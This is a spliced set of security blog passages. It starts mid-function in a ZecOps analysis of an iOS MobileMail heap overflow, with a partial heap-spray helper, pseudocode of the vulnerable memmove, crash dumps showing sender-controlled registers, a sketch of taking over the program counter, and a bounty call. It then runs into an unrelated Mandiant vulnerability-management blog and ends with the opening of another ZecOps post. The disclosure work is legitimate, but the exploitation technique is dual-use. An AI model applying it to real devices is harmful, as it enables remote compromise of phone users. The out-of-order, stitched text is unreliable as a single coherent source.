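    line = (chunk * (line_len // len(chunk) + 1))[:line_len]
    lines = []
    remaining = total_bytes
    while remaining > 0:
        lines.append(line[:min(line_len, remaining)])
        remaining -= line_len
    return b"\r\n".join(lines)

body = build_spray_body(b"\x41\x42\x43\x44\x45\x46\x47\x48", 0x800000)  # illustrative payload chunk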

Trigger

An oversized email is capable of reproducing the vulnerability as a PoC (see details in our previous blog), but for a stable exploit we need to take a closer look at -[MFMutableData appendBytes:length:].

-[MFMutableData appendBytes:length:]
{
  int old_len = [self length];
  //...
  char* bytes = self->bytes;
  if(!bytes){
     bytes = [self _mapMutableData]; // might be a pointer to an 8-byte heap chunk if mmap failed
  }
  copy_dst = bytes + old_len;
  //...
  memmove(copy_dst, append_bytes, append_length); // uses append_length for the copy, causing an OOB write into a small heap chunk
}

The destination address of memmove is “bytes + old_len” instead of “bytes”. So what if we accumulate too much data before triggering the vulnerability? The “old_len” would end up with a very large value, so the destination would be an invalid address beyond the edge of the region, crashing immediately, given that the size of the MALLOC_NANO region is 512MB.


             +----------------+0x280000000
             |                |
   bytes --> +----------------+\
             |                | +
             |                | |
             |                | |
             |    padding     | |
             |                | |
             |                | | old_len
             |                | |
             |                | |
             |                | |
             |                | +
copy_dst --> +----------------+/
             | overflow data  |
             +----------------+
             |                |
             |                |
             |                |
             |                |
             +----------------+0x2a0000000

In order to reduce the size of “padding”, we need to consume as much data as possible before triggering the vulnerability – a memory leak would be one of our candidates.

Noteworthy, the “padding” doesn’t mean the overflow address is completely random; the “padding” is predictable per hardware model since the RAM size is the same, and mmap usually failed at the same size during our tests.

Crash analysis

This post discusses several triggers and exploitability of the MobileMail vulnerability detected in the wild which we covered in our previous blog.

Case 1 shows that the vulnerability was triggered in the wild before it was disclosed.

Case 2 is due to memory corruption in the MALLOC_NANO region; the value of the corrupted memory is part of the sent email and completely controlled by the sender.

Case 1

The following crash was triggered right inside the vulnerable function while the overflow happens. 

Coalition:           com.apple.mobilemail [521]

Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Subtype: KERN_INVALID_ADDRESS at 0x000000004a35630e //[a]
VM Region Info: 0x4a35630e is not in any region.  Bytes before following region: 3091946738
      REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
      UNUSED SPACE AT START
--->  
      __TEXT                 000000010280c000-0000000102aec000 [ 2944K] r-x/r-x SM=COW  ...p/MobileMail]


Thread 4 Crashed:
0   libsystem_platform.dylib      	0x00000001834a5a80 _platform_memmove  + 208
       0x1834a5a74         ldnp x10, x11, [x1, #16]       
       0x1834a5a78         add x1, x1, 0x20               
       0x1834a5a7c         sub x2, x2, x5                 
       0x1834a5a80         stp x12, x13, [x0]   //[b]          
       0x1834a5a84         stp x14, x15, [x0, #16]        
       0x1834a5a88         subs x2, x2, 0x40              
       0x1834a5a8c         b.ls 0x00002ab0    

1   MIME                          	0x00000001947ae104 -[MFMutableData appendBytes:length:]  + 356
2   Message                       	0x0000000194f6ce6c -[MFDAMessageContentConsumer consumeData:length:format:mailMessage:]  + 804
3   DAEAS                         	0x000000019ac5ca8c -[ASAccount folderItemsSyncTask:handleStreamOperation:forCodePage:tag:withParentItem:withData:dataLength:]  + 736
4   DAEAS                         	0x000000019aca3fd0 -[ASFolderItemsSyncTask handleStreamOperation:forCodePage:tag:withParentItem:withData:dataLength:]  + 524
5   DAEAS                         	0x000000019acae338 -[ASItem _streamYourLittleHeartOutWithContext:]  + 440
6   DAEAS                         	0x000000019acaf4d4 -[ASItem _streamIfNecessaryFromContext:]  + 96
7   DAEAS                         	0x000000019acaf758 -[ASItem _parseNextValueWithDataclass:context:root:parent:callbackDict:streamCallbackDict:parseRules:account:]  + 164
8   DAEAS                         	0x000000019acb001c -[ASItem parseASParseContext:root:parent:callbackDict:streamCallbackDict:account:]  + 776
9   DAEAS                         	0x000000019acaf7d8 -[ASItem _parseNextValueWithDataclass:context:root:parent:callbackDict:streamCallbackDict:parseRules:account:]  + 292
10  DAEAS                         	0x000000019acb001c -[ASItem parseASParseContext:root:parent:callbackDict:streamCallbackDict:account:]  + 776
...

Thread 4 crashed with ARM Thread State (64-bit):
    x0: 0x000000004a35630e   x1: 0x00000001149af432   x2: 0x0000000000001519   x3: 0x000000004a356320
    x4: 0x0000000100000028   x5: 0x0000000000000012   x6: 0x0000000c04000100   x7: 0x0000000114951a00
    x8: 0x44423d30443d3644   x9: 0x443d30443d38463d  x10: 0x3d31413d31443d30  x11: 0x31413d31463d3444
   x12: 0x33423d30453d3043  x13: 0x433d30443d35423d  x14: 0x3d30443d36443d44  x15: 0x30443d38463d4442
   x16: 0x00000001834a59b0  x17: 0x0200080110000100  x18: 0xfffffff00a0dd260  x19: 0x000000000000152b
   x20: 0x00000001149af400  x21: 0x000000004a35630e  x22: 0x000000004a35630f  x23: 0x0000000000000008
   x24: 0x000000000000152b  x25: 0x0000000000000000  x26: 0x0000000000000000  x27: 0x00000001149af400
   x28: 0x000000018dbd34bc   fp: 0x000000016da4c720   lr: 0x00000001947ae104
    sp: 0x000000016da4c720   pc: 0x00000001834a5a80 cpsr: 0x80000000

With [a] and [b] we know that the process crashed inside “memmove”, called by “-[MFMutableData appendBytes:length:]”, which means the value of “copy_dst” was an invalid address in the first place: 0x4a35630e.

So where did the value of the register x0 (0x4a35630e) come from? It’s much smaller than the lowest valid address. 

It turns out that the process crashed after failing to mmap a file and then also failing to allocate the 8-byte chunk.

The invalid address 0x4a35630e is actually the offset, i.e. the length of the MFMutableData before triggering the vulnerability (“old_len”). When calloc fails to allocate the memory it returns NULL, so copy_dst becomes “0 + old_len (0x4a35630e)”.

In this case the “old_len” is about 1.2GB, which matches the average length of our POC and is likely to cause an mmap failure and trigger the vulnerability.

Please note that x8-x15, and x0 are fully controlled by the sender.

The crash gives us another answer for our question above: “What if we accumulate too much data before triggering the vulnerability?” – The allocation of the 8-bytes memory could fail and crash while copying the payload to an invalid address. This can make reliable exploitation more difficult, as we may crash before taking over the program counter.

A Blast From The Past: Mysterious Trigger on iOS 3.1.3 in 2010!

Noteworthy, we found a public example of exactly a similar trigger by an anonymous user in modmy.com forums: https://forums.modmy.com/native-iphone-ipod-touch-app-launches-f29/734050-mail-app-keeps-crashing-randomly.html

Vulnerable version: iOS 3.1.3 on iPhone 2G
Time of crash: 22nd of October, 2010

The user “shyamsandeep” registered on the 12th of June 2008, last logged in on the 16th of October 2011, and had a single post in the forum, which contained this exact trigger.

This crash had r0 equal to 0x037ea000, which could be the result of the first vulnerability we disclosed in our previous blog (the one due to ftruncate() failure). Interestingly, as we explained in the first case, it could also be the result of a failed 8-byte allocation; however, it is not possible to determine the exact reason since the log lacks memory-region information. Nonetheless, it is certain that triggers for this exploitable vulnerability have existed in the wild since 2010.

Identifier: MobileMail
Version: ??? (???)
Code Type: ARM (Native)
Parent Process: launchd [1]

Date/Time: 2010-10-22 08:14:31.640 +0530
OS Version: iPhone OS 3.1.3 (7E18)
Report Version: 104

Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x037ea000
Crashed Thread:  4
Thread 4 Crashed:
0 libSystem.B.dylib 0x33aaef3c 0x33aad000 + 7996 //memcpy + 0x294
1 MIME 0x30a822a4 0x30a7f000 + 12964 //_FastMemoryMove + 0x44
2 MIME 0x30a8231a 0x30a7f000 + 13082 // -[MFMutableData appendBytes:length:] + 0x6a
3 MIME 0x30a806d6 0x30a7f000 + 5846 // -[MFMutableData appendData:] + 0x32
4 Message 0x342e2938 0x34251000 + 596280 // -[DAMessageContentConsumer consumeData:length:format:mailMessage:] + 0x25c
5 Message 0x342e1ff8 0x34251000 + 593912 // -[DAMailAccountSyncConsumer consumeData:length:format:mailMessage:] +0x24
6 DataAccess 0x34146b22 0x3413e000 + 35618 // -[ASAccount folderItemsSyncTask:handleStreamOperation:forCodePage:tag:withParentItem:withData:dataLength:] + 0x162
7 DataAccess 0x3416657c 0x3413e000 + 165244 // -[ASFolderItemsSyncTask handleStreamOperation:forCodePage:tag:withParentItem:withData:dataLength:] + 0x108
...

Thread 4 crashed with ARM Thread State:
r0: 0x037ea000 r1: 0x008729e0 r2: 0x00002205 r3: 0x4e414153
r4: 0x41415367 r5: 0x037e9825 r6: 0x00872200 r7: 0x007b8b78
r8: 0x0001f825 r9: 0x001fc098 r10: 0x00872200 r11: 0x0087c200
ip: 0x0000068a sp: 0x007b8b6c lr: 0x30a822ab pc: 0x33aaef3c
cpsr: 0x20000010

Case 2

Following is another crash that happened after an email was received and processed.

Coalition:           com.apple.mobilemail [308]

Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Subtype: KERN_INVALID_ADDRESS at 0x0041004100410041 // [a]
VM Region Info: 0x41004100410041 is not in any region.  Bytes after previous region: 18296140473139266  
      REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
      mapped file            00000002d31f0000-00000002d6978000 [ 55.5M] r--/rw- SM=COW  ...t_id=9bfc1855
--->  
      UNUSED SPACE AT END

Thread 13 name:  Dispatch queue: Internal _UICache queue
Thread 13 Crashed:
0   libobjc.A.dylib               	0x00000001b040fca0 objc_release  + 16
       0x1b040fc94         mov x29, sp                    
       0x1b040fc98         cbz x0, 0x0093fce4             
       0x1b040fc9c         tbnz x0, #63, 0x0093fce4       
       0x1b040fca0         ldr x8, [x0]            // [b]       
       0x1b040fca4         and x8, x8, 0xffffffff8        
       0x1b040fca8         ldrb w8, [x8, #32]             
       0x1b040fcac         tbz w8, #2, 0x0093fd14         

1   CoreFoundation                	0x00000001b1119408 -[__NSDictionaryM removeAllObjects]  + 600
2   libdispatch.dylib             	0x00000001b0c5d7d4 _dispatch_client_callout  + 16
3   libdispatch.dylib             	0x00000001b0c0bc1c _dispatch_lane_barrier_sync_invoke_and_complete  + 56    
4   UIFoundation                  	0x00000001bb9136b0 __16-[_UICache init]_block_invoke  + 76     
5   libdispatch.dylib             	0x00000001b0c5d7d4 _dispatch_client_callout  + 16
6   libdispatch.dylib             	0x00000001b0c0201c _dispatch_continuation_pop$VARIANT$mp  + 412
7   libdispatch.dylib             	0x00000001b0c11fa8 _dispatch_source_invoke$VARIANT$mp  + 1308
8   libdispatch.dylib             	0x00000001b0c0ee00 _dispatch_kevent_worker_thread  + 1224   
9   libsystem_pthread.dylib       	0x00000001b0e3e124 _pthread_wqthread  + 320          
10  libsystem_pthread.dylib       	0x00000001b0e40cd4 start_wqthread  + 4 


Thread 13 crashed with ARM Thread State (64-bit):
    x0: 0x0041004100410041   x1: 0x00000001de1ac18a   x2: 0x0000000000000000   x3: 0x0000000000000010
    x4: 0x00000001b0c60388   x5: 0x0000000000000010   x6: 0x0000000000000000   x7: 0x0000000000000000
    x8: 0x0000000281f94090   x9: 0x00000001b143f670  x10: 0x0000000142846800  x11: 0x0000004b0000007f
   x12: 0x00000001428468a0  x13: 0x000041a1eb487861  x14: 0x0000000283ed9d10  x15: 0x0000000000000004
   x16: 0x00000001eb487860  x17: 0x00000001b11191b0  x18: 0x0000000000000000  x19: 0x0000000281dce4c0
   x20: 0x0000000282693398  x21: 0x0000000282693330  x22: 0x0000000000000000  x23: 0x0000000000000000
   x24: 0x0000000281dce4c8  x25: 0x000000000c000000  x26: 0x000000000000000d  x27: 0x00000001eb48e000
   x28: 0x0000000282693330   fp: 0x000000016b8fe820   lr: 0x00000001b1119408
    sp: 0x000000016b8fe820   pc: 0x00000001b040fca0 cpsr: 0x20000000

[a]: The pointer of the object was overwritten with “0x0041004100410041” which is AAAA in unicode. 

[b] marks one of the instructions around the crash address, which we have added for better understanding. The process crashed on the instruction “ldr x8, [x0]” while -[__NSDictionaryM removeAllObjects] was trying to release one of the objects.

By reverse engineering -[__NSDictionaryM removeAllObjects], we understand that register x0 was loaded from x28 (0x0000000282693330), since register x28 was never changed before the crash.

Let’s take a look at the virtual memory region information for x28 (0x0000000282693330): the overwritten object was stored in the MALLOC_NANO region, which holds small heap chunks. The heap overflow vulnerability corrupts the same region, since it overflows an 8-byte heap chunk that is also stored in MALLOC_NANO.

  MALLOC_NANO         	 0x0000000280000000-0x00000002a0000000	 rw-/rwx

This crash is actually pretty close to controlling the PC, since it controls the pointer of an Objective-C object. By pointing register x0 to memory sprayed with a fake object and a fake class containing a fake method cache, attackers could control the PC; this Phrack article explains the details.

Summary

  1. It is rare to see user-provided inputs that both trigger and control remote vulnerabilities. 
  2. We prove that it is possible to exploit this vulnerability using the described technique.
  3. We have observed real-world triggers with a large allocation size.
  4. We have seen real-world triggers with values that are controlled by the sender.
  5. The emails we looked for were missing / deleted.
  6. The success rate can be improved. This bug had in-the-wild triggers as early as 2010, on an iPhone 2G device.
  7. In our opinion, based on the above, this bug is worth an out-of-band patch.

How Can Apple Improve the Logs?

The lack of detail in iOS logs, and the lack of options for individuals and organizations to choose the granularity of the data, need to change for iOS to be on par with macOS, Linux, and Windows capabilities. In general, the concept of having to hack into a phone in order to analyze it is completely flawed and should not be the normal way of doing things.

We suggest Apple improve its error diagnostics process to help individuals, organizations, and SOCs to investigate their devices. We have a few helpful technical suggestions:

  1. Crashes improvement: enable viewing the memory next to each pointer / register
  2. Crashes improvement: show stack / heap memory / memory near the registers
  3. Add PIDs/PPIDs/UID/EUID to all applicable events
  4. Ability to send these logs to a remote server without physically connecting the phone – we are aware of multiple cases where the logs were mysteriously deleted
  5. Ability to perform a complete digital forensics analysis of a suspected iOS device without needing to hack into the device first

Questions for Apple

  • How many triggers of this heap overflow have you seen since iOS 3.1.3? 
  • How were you able to determine within one day that none of the triggers of this bug were malicious, and did you actually go over each event?
  • When are you planning to patch this vulnerability?
  • What are you going to do about enhancing forensics on mobile devices (see the list above)?

MailDemon Bounty

If you experienced any of the three symptoms below, use another mail application (e.g. Outlook for Desktop), and send the relevant emails (including the Email Source) to the address maildemon@zecops.org – there are instructions at the bottom of this post.

Suspected emails may appear as follows:

Bounty details: We will validate if the email contains an exploit code. For the first two submissions containing Mail exploits that were verified by ZecOps team, we will provide:

  • $10,000 USD bounty
  • One license for ZecOps Gluon (DFIR for mobile devices) for 1 year
  • One license for ZecOps Neutrino (DFIR for endpoints and servers) for 1 year. 

We will provide an additional bounty of up to $7,337 for an exploit primitive as described above.

We will determine the first two valid submissions according to the date they were received on our email server and whether they contain exploit code. In total: $27,337 USD in bounties plus licenses for ZecOps Gluon & Neutrino. 

For suspicious submissions, we would also request device logs in order to determine other relevant information about potential attackers exploiting vulnerabilities in Mail and other vulnerabilities on the device.

Please note: Not every email that causes the symptoms above and is shared with us will qualify for a bounty, as there could be other bugs in MobileMail/maild – we’re only looking for ones that contain an attack.

How to send the emails using Outlook:

  1. Open Outlook on a computer and locate the relevant email
  2. Select Actions => Other Actions => View Source
  3. Send the source to maildemon@zecops.org

How to send the suspicious email via Gmail:

  1. Locate and select the relevant message
  2. Click on the three dots “…” in the menu and click on Forward as an attachment
  3. Send the email with the “.eml” attachment to maildemon@zecops.org

* Please note that we have intentionally not published all details. This bug is still unpatched, and we want to avoid further misuse of it.


Putting the Model to Work: Enabling Defenders With Vulnerability Intelligence — Intelligence for Vulnerability Management, Part Four

One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization’s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations.

Organizations often have to make difficult choices when it comes to patch prioritization. Many are faced with securing complex network infrastructure with thousands of systems, different operating systems, and disparate geographical locations. Even when armed with a simplified vulnerability rating system, it can be hard to know where to start. This problem is compounded by the ever-changing threat landscape and increased access to zero-days.

At FireEye, we apply the rich body of knowledge accumulated over years of global intelligence collection, incident response investigations, and device detections, to help our customers defend their networks. This understanding helps us to discern between hundreds of newly disclosed vulnerabilities to provide ratings and assessments that empower network defenders to focus on the most significant threats and effectively mitigate risk to their organizations. 

In this blog post, we’ll demonstrate how we apply intelligence to help organizations assess risk and make informed decisions about vulnerability management and patching in their environments.

Functions of Vulnerability Intelligence

Vulnerability intelligence helps clients to protect their organizations, assets, and users in three main ways:


Figure 1: Vulnerability intelligence can help with risk assessment and informed decision making

Tailoring Vulnerability Prioritization

We believe it is important for organizations to build a defensive strategy that prioritizes the types of threats that are most likely to impact their environment, and the threats that could cause the most damage. When organizations have a clear picture of the spectrum of threat actors, malware families, campaigns, and tactics that are most relevant to their organization, they can make more nuanced prioritization decisions when those threats are linked to exploitation of vulnerabilities. A lower risk vulnerability that is actively being exploited in the wild against your organization or similar organizations likely has a greater potential impact to you than a vulnerability with a higher rating that is not actively being exploited.


Figure 2: Patch Prioritization Philosophy

Integration of Vulnerability Intelligence in Internal Workflows

Based on our experience assisting organizations globally with enacting intelligence-led security, we outline three use cases for integrating vulnerability intelligence into internal workflows.


Figure 3: Integration of vulnerability intelligence into internal workflows

Tools and Use Cases for Operationalizing Vulnerability Intelligence

1. Automate Processes by Fusing Intelligence with Internal Data

Automation is valuable to security teams with limited resources. Similar to the automated detection and blocking of indicator data, vulnerability threat intelligence can be automated by merging data from internal vulnerability scans with threat intelligence (via systems like the Mandiant Intelligence API) and aggregating the results into a SIEM, threat intelligence platform, and/or ticketing system. This enhances visibility into various sources of both internal and external data, with vulnerability intelligence providing risk ratings and indicating which vulnerabilities are being actively exploited. FireEye also offers a custom tool called FireEye Intelligence Vulnerability Explorer (“FIVE”), described in more detail below, for quickly correlating vulnerabilities found in logs and scans with Mandiant ratings.

Security teams can similarly automate communication and workflow tracking processes using threat intelligence by defining rules for auto-generating tickets based on certain combinations of Mandiant risk and exploitation ratings; for example, internal service-level-agreements (SLAs) could state that ‘high’ risk vulnerabilities that have an exploitation rating of ‘available,’ ‘confirmed,’ or ‘wide’ must be patched within a set number of days. Of course, the SLA will depend on the company’s operational needs, the capability of the team that is advising the patch process, and executive buy-in to the SLA process. Similarly, there may be an SLA defined for patching vulnerabilities that are of a certain age. Threat intelligence tells us that adversaries continue to use older vulnerabilities as long as they remain effective. For example, as recently as January 2020, we observed a Chinese cyber espionage group use an exploit for CVE-2012-0158, a Microsoft Office stack-based buffer overflow vulnerability originally disclosed in 2012, in malicious email attachments to target organizations in Southeast Asia. Automating the vulnerability-scan-to-vulnerability-intelligence correlation process can help bring this type of issue to light. 
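As a rough illustration of how such an SLA rule could be encoded in a ticketing integration, the sketch below maps hypothetical Mandiant-style risk and exploitation ratings to a patch window in days. The rating strings and the day counts are assumptions for the example only; a real policy would reflect the organization’s own SLAs.

#include <string.h>

/* Illustrative only: map a (risk, exploitation) rating pair to an SLA window. */
static int patch_sla_days(const char *risk, const char *exploitation)
{
    int exploited = strcmp(exploitation, "available") == 0 ||
                    strcmp(exploitation, "confirmed") == 0 ||
                    strcmp(exploitation, "wide") == 0;

    if (strcmp(risk, "critical") == 0)
        return exploited ? 2 : 14;    /* patch out of band */
    if (strcmp(risk, "high") == 0)
        return exploited ? 7 : 30;
    return 90;                        /* regular patch cycle */
}

A ticketing system fed by the scan-to-intelligence correlation could call a rule like this for each finding and auto-generate a ticket with the corresponding due date.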

Another potential use case employing automation would be incorporating vulnerability intelligence as security teams are testing updates or new hardware and software prior to introduction into the production environment. This could dramatically reduce the number of vulnerabilities that need to be patched in production and help prioritize those vulnerabilities that need to be patched first based on your organization’s unique threat profile and business operations.

2. Communicating with Internal Stakeholders

Teams can leverage vulnerability reporting to send internal messaging, such as flash-style notifications, to alert other teams when Mandiant rates a vulnerability known to impact your systems high or critical. These are the vulnerabilities that should take priority in patching and should be patched outside of the regular cycle.

Data-informed intelligence analysis may help convince stakeholders outside of the security organization of the importance of patching quickly, even when this is inconvenient to business operations. Threat intelligence can inform an organization’s appropriate use of resources for security given the potential business impact of security incidents.

3. Threat Modeling

Organizations can leverage vulnerability threat intelligence to inform their threat modeling to gain insight into the most likely threats to their organization, and better prepare to address threats in the mid to long term. Knowledge of which adversaries pose the greatest threat to your organization, and then knowledge of which vulnerabilities those threat groups are exploiting in their operations, can enable your organization to build out security controls and monitoring based on those specific CVEs.

Examples

The following examples illustrate workflows supported by vulnerability threat intelligence to demonstrate how organizations can operationalize threat intelligence in their existing security teams to automate processes and increase efficiency given limited resources.

Example 1: Using FIVE for Ad-hoc Vulnerability Prioritization

The FireEye Intelligence Vulnerability Explorer (“FIVE”) tool is available for customers here. It is available for MacOS and Windows, requires a valid subscription for Mandiant Vulnerability Intelligence, and is driven from an API integration.


Figure 4: FIVE Tool for Windows and MacOS

In this scenario, an organization’s intelligence team was asked to quickly identify any vulnerability that required patching from a server vulnerability scan after that server was rebuilt from a backup image. The intelligence team was presented with a text file containing a list of CVE numbers. Users can drag-and-drop a text readable file (CSV, TEXT, JSON, etc.) into the FIVE tool and the CVE numbers will be discovered from the file using regex. As shown in Figure 6 (below), in this example, the following vulnerabilities were found in the file and presented to the user. 


Figure 5: FIVE tool startup screen waiting for file input


Figure 6: FIVE tool after successfully regexing the CVE-IDs from the file
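The exact pattern FIVE uses internally is not published, but extracting CVE-IDs from an arbitrary text-readable file is essentially a single regular-expression pass. The following is a hedged sketch of that idea using POSIX regex; it is not FIVE’s code.

#include <regex.h>
#include <stdio.h>

/* Print every CVE-ID found in a block of text (illustrative sketch only). */
static void print_cve_ids(const char *text)
{
    regex_t re;
    regmatch_t m;

    if (regcomp(&re, "CVE-[0-9]{4}-[0-9]{4,}", REG_EXTENDED) != 0)
        return;

    const char *p = text;
    while (regexec(&re, p, 1, &m, 0) == 0) {
        printf("%.*s\n", (int)(m.rm_eo - m.rm_so), p + m.rm_so);
        p += m.rm_eo;   /* continue scanning after the previous match */
    }
    regfree(&re);
}

int main(void)
{
    print_cve_ids("server scan flagged CVE-2019-19781 and CVE-2012-0158");
    return 0;
}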

After selecting all CVE-IDs, the user clicked the “Fetch Vulnerabilities” button, causing the application to make the necessary two-stage API call to the Intelligence API.

The output depicted in Figure 7 shows the user which vulnerabilities should be prioritized based on FireEye’s risk and exploitation ratings. The red and maroon boxes indicate vulnerabilities that require attention, while the yellow boxes indicate vulnerabilities that should be reviewed for possible action. Details of the vulnerabilities are displayed below, with associated intelligence report links providing further context.


Figure 7: FIVE tool with meta-data, CVE-IDs, and links to related Intelligence Reports

FIVE can also facilitate other use cases for vulnerability intelligence. For example, this chart can be attached in messaging to other internal stakeholders or executives for review, as part of a status update to provide visibility on the organization’s vulnerability management program.

Example 2: Vulnerability Prioritization, Internal Communications, Threat Modeling

CVE-2019-19781 is a vulnerability affecting Citrix that Mandiant Threat Intelligence rated critical. Mandiant discussed early exploitation of this vulnerability in a January 2020 blog post. We continued to monitor for additional exploitation, and informed our clients when we observed exploitation by ransomware operators and the Chinese espionage group APT41.

In cases like these, threat intelligence can help impacted organizations find the “signal” in the “noise” and prioritize patching using knowledge of exploitation and the motives and targeting patterns of the threat actors behind the exploitation. Enterprises can use intelligence to inform internal stakeholders of the potential risk and provide context as to the potential business and financial impact of a ransomware infection or an intrusion by a highly resourced state-sponsored group. This supports the immediate patch prioritization decision while simultaneously emphasizing the value of a holistically informed security organization.

Example 3: Intelligence Reduces Unnecessary Resource Expenditure — Automating Vulnerability Prioritization and Communications

Another common application for vulnerability intelligence is informing security teams and stakeholders when to stand down. When a vulnerability is reported in the media, organizations often spin up resources to patch as quickly as possible. Leveraging threat intelligence in security processes helps an organization discern when it is necessary to respond in an all-hands-on-deck manner.

Take the case of CVE-2019-12650, originally disclosed on Sept. 25, 2019 with an NVD rating of “High.” Without further information, an organization relying on this score to determine prioritization may include this vulnerability in the same patch cycle along with numerous other vulnerabilities rated High or Critical. As previously discussed, our experts reviewed the vulnerability and determined that it required the highest level of privileges available to successfully exploit, and that there was no evidence of exploitation in the wild.

This is a case where threat intelligence reporting as well as automation can effectively minimize the need to unnecessarily spin up resources. Although the public NVD score rated this vulnerability high, Mandiant Intelligence rated it as “low” risk due to the high level of privileges needed to use it and lack of exploitation in the wild. Based on this assessment, organizations may decide that this vulnerability could be patched in the regular cycle and does not necessitate use of additional resources to patch out-of-band. When Mandiant ratings are automatically integrated into the patching ticket generation process, this can support efficient prioritization. Furthermore, an organization could use the analysis to issue an internal communication informing stakeholders of the reasoning behind lowering the prioritization.

Vulnerabilities: Managed

Because we have been closely monitoring vulnerability exploitation trends for years, we were able to distinguish when attacker use of zero-days evolved from use by a select class of highly skilled attackers, to becoming accessible to less skilled groups with enough money to burn. Our observations consistently underscore the speed with which attackers exploit useful vulnerabilities, and the lack of exploitation for vulnerabilities that are hard to use or do not help attackers fulfill their objectives. Our understanding of the threat landscape helps us to discern between hundreds of newly disclosed vulnerabilities to provide ratings and assessments that empower network defenders to focus on the most significant threats and effectively mitigate risk to their organizations.

Mandiant Threat Intelligence enables organizations to implement a defense-in-depth approach to holistically mitigate risk by taking all feasible steps—not just patching—to prevent, detect, and stymie attackers at every stage of the attack lifecycle with both technology and human solutions.

Register today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in vulnerability threats, trends and recommendations in our upcoming April 30 webinar.

Additional Resources

Zero-Day Exploitation Increasingly Demonstrates Access to Money, Rather than Skill — Intelligence for Vulnerability Management, Part One

Think Fast: Time Between Disclosure, Patch Release and Vulnerability Exploitation — Intelligence for Vulnerability Management, Part Two

Separating the Signal from the Noise: How Mandiant Intelligence Rates Vulnerabilities — Intelligence for Vulnerability Management, Part Three

Mandiant offers Intelligence Capability Development (ICD) services to help organizations optimize their ability to consume, analyze and apply threat intelligence.

The FIVE tool is available on the FireEye Market. It requires a valid subscription for Mandiant Vulnerability Intelligence, and is driven from an API integration. Please contact your Intelligence Enablement Manager or FireEye Support to obtain API keys. 

Mandiant's OT Asset Vulnerability Assessment Service informs customers of relevant vulnerabilities by matching a customer's asset list against vulnerabilities and advisories. Relevant vulnerabilities and advisories are delivered in a report from as little as once a year, to as often as once a week. Additional add-on services such as asset inventory development and deep dive analysis of critical assets are available. Please contact your Intelligence Enablement Manager for more information.

You’ve Got (0-click) Mail!


Updates

Impact & Key Details (TL;DR) :

  • The vulnerability allows remote code execution and enables an attacker to remotely infect a device by sending emails that consume a significant amount of memory
  • The vulnerability does not necessarily require a large email – a regular email which is able to consume enough RAM would be sufficient. There are many ways to achieve such resource exhaustion including RTF, multi-part, and other methods
  • Both vulnerabilities were triggered in-the-wild
  • The vulnerability can be triggered before the entire email is downloaded, hence the email content won’t necessarily remain on the device
  • We are not dismissing the possibility that attackers may have deleted remaining emails following a successful attack
  • Vulnerability trigger on iOS 13: Unassisted (/zero-click) attacks on iOS 13 when Mail application is opened in the background
  • Vulnerability trigger on iOS 12: The attack requires a click on the email. The attack will be triggered before rendering the content. The user won’t notice anything anomalous in the email itself
  • Unassisted attacks on iOS 12 can be triggered (aka zero click) if the attacker controls the mail server
  • The vulnerabilities have existed at least since iOS 6 (released September 2012, when the iPhone 5 came out)
  • The earliest triggers we have observed in the wild were on iOS 11.2.2 in January 2018
  • FAQ

This post is the first part of a series – See post number 2


Multiple Vulnerabilities in MobileMail/Maild

Introduction

Following a routine iOS Digital Forensics and Incident Response (DFIR) investigation, ZecOps found a number of suspicious events affecting the default Mail application on iOS, dating as far back as Jan 2018. ZecOps analyzed these events and discovered an exploitable vulnerability affecting Apple’s iPhones and iPads. ZecOps detected multiple triggers of this vulnerability in the wild against enterprise users, VIPs, and MSSPs, over a prolonged period of time.

The attack consists of sending a specially crafted email to a victim’s mailbox, enabling it to trigger the vulnerability in the context of the iOS MobileMail application on iOS 12 or maild on iOS 13. Based on ZecOps Research and Threat Intelligence, we surmise with high confidence that these vulnerabilities – in particular, the remote heap overflow – are widely exploited in the wild in targeted attacks by an advanced threat operator(s).

The suspected targets included:

  • Individuals from a Fortune 500 organization in North America
  • An executive from a carrier in Japan 
  • A VIP from Germany
  • MSSPs from Saudi Arabia and Israel
  • A Journalist in Europe
  • Suspected: An executive from a Swiss enterprise

A few of the suspicious events even included strings commonly used by hackers (e.g. 414141…4141) – see the FAQ. After verifying that it wasn’t a red-team exercise, we validated that these strings were provided by the email sender. Notably, although the data confirms that the exploit emails were received and processed by the victims’ iOS devices, the corresponding emails that should have been received and stored on the mail server were missing. Therefore, we infer that these emails may have been deleted intentionally as part of the attack’s operational security cleanup measures.

We believe that these attacks correlate with at least one nation-state threat operator, or a nation-state that purchased the exploit from a third-party researcher at Proof of Concept (POC) grade and used it ‘as-is’ or with minor modifications (hence the 4141…41 strings).

While ZecOps refrains from attributing these attacks to a specific threat actor, we are aware that at least one ‘hackers-for-hire’ organization is selling exploits using vulnerabilities that leverage email addresses as a main identifier.

We advise updating as soon as an iOS update is available.

Exploitation timeline

We are aware of multiple triggers in the wild that happened starting from Jan 2018, on iOS 11.2.2. It is likely that the same threat operators are actively abusing these vulnerabilities presently. It is possible that the attacker(s) were using this vulnerability even earlier. We have seen similarities between some of the suspected victims during triggers to these vulnerabilities.

Affected versions:

  • All tested iOS versions are vulnerable, including iOS 13.4.1. 
  • Based on our data, these bugs were actively triggered on iOS 11.2.2 and potentially earlier.
  • iOS 6 and above are vulnerable. iOS 6 was released in 2012. Versions prior to iOS 6 might be vulnerable too, but we haven’t checked earlier versions. At the time of the iOS 6 release, the iPhone 5 was on the market.

ZecOps Customers & Partners

ZecOps Gluon iOS DFIR customers can detect attacks leveraging MobileMail/maild vulnerabilities.

Thank you

Before we dive deeper, we would like to thank Apple’s product security and engineering teams for delivering a beta patch to block these vulnerabilities from further abuse once it is deployed to GA.

Vulnerability Details

ZecOps found that the implementation of MFMutableData in the MIME library lacks error checking for the ftruncate() system call, which leads to an Out-Of-Bounds write. We also found a way to trigger the OOB write without waiting for the ftruncate system call to fail. In addition, we found a heap overflow that can be triggered remotely.

We are aware of remote triggers of both vulnerabilities in the wild. 

